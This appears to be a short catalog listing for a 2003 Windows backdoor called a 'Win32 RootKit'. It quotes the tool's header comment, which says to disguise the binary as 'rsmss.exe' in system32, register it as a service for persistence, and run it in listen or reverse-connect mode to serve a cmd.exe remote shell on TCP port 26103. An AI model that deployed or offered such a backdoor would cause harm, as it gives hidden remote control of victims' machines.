by Christophe Devine
Written in C, Source included
Released in october 2003
/* * Win32 RootKit - cmd.exe remote shell backdoor * (c) 2003 Christophe Devine * Distributed for educational purposes only! * * Before running ntbindshell.exe, rename it to * "rsmss.exe" and copy it into %windir%\system32. * This program will automatically register itself * as a system service the first time it is run, * provided it has the required privileges. * * To remove the service, start Regedit and delete * HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ * Services\RSMSS, then reboot the computer. * * Backdoor usage: * * normal (listen) mode: rsmss <port> * reverse-connect mode: rsmss <port> <host> */ Christophe DevineMegaSecurity
Server: size: 24.576 bytes port: 26103 TCP startup: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RSMSS